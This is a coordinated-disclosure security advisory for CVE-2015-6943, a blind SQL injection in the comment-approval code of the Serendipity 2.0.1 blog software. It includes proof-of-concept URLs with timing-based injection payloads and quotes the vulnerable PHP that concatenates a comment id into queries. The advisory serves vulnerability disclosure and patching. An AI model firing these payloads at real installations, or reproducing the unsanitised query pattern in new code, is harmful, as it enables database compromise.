Serendipity 2.0.1: Blind SQL Injection
Date: 2015-09-01 10:44:361. Introduction
| Affected Product: | Serendipity 2.0.1 |
| Fixed in: | 2.0.2 |
| Fixed Version Link: | https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip |
| Vendor Contact: | serendipity@supergarv.de |
| Vulnerability Type: | Blind SQL Injection |
| Remote Exploitable: | Yes |
| Reported to vendor: | 07/21/2015 |
| Disclosed to public: | 09/01/2015 |
| Release mode: | Coordinated release |
| CVE: | CVE-2015-6943 |
| Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
There is a blind SQL injection in Serendipity 2.0.1 when approving comments. It can be exploited content-based, but this requires an Email token. Timing-based exploitation does not require a token and is thus easier to exploit.
To prepare for the attack, an attacker has to visit the Configuration and set "Use Tokens for Comment Moderation" to true.
Please note that admin credentials are required.
3. Proof of Concept
http://localhost/serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=pending&serendipity[id]=8' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23&serendipity[token]=ValidAntiCSRFToken
-> true
http://localhost//serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=approve&serendipity[id]=8' AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23&serendipity[token]=ValidAntiCSRFToken
-> false
Note that the id must be that of an existing comment, the action must be acceptable - ie only pending comments can be approved and only approved comments can be set to pending - and the CSRF token must be valid.
4. Code
/include/admin/comments.inc.php
serendipity_approveComment($serendipity['GET']['id'], $rs['entry_id']); <- user input
/include/functions_comments.inc.php
function serendipity_approveComment($cid, $entry_id, $force = false, $moderate = false, $token = false) {
global $serendipity;
$goodtoken = serendipity_checkCommentToken($token, $cid); <- not secured
[...]
}
function serendipity_checkCommentToken($token, $cid) {
global $serendipity;
$goodtoken = false;
if ($serendipity['useCommentTokens']) {
// Delete any comment tokens older than 1 week.
serendipity_db_query("DELETE FROM {$serendipity['dbPrefix']}options
WHERE okey LIKE 'comment_%' AND name < " . (time() - 604800) );
// Get the token for this comment id
$tokencheck = serendipity_db_query("SELECT * FROM {$serendipity['dbPrefix']}options
WHERE okey = 'comment_" . $cid . "' LIMIT 1", true, 'assoc'); <- still not secured
[...]
}
5. Solution
To mitigate this issue please upgrade at least to version 2.0.2:
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip
Please note that a newer version might already be available.
5. Report Timeline
| 07/21/2015 | Informed Vendor about Issue |
| 07/24/2015 | Vendor releases Version 2.0.2 |
| 09/01/2015 | Disclosed to public |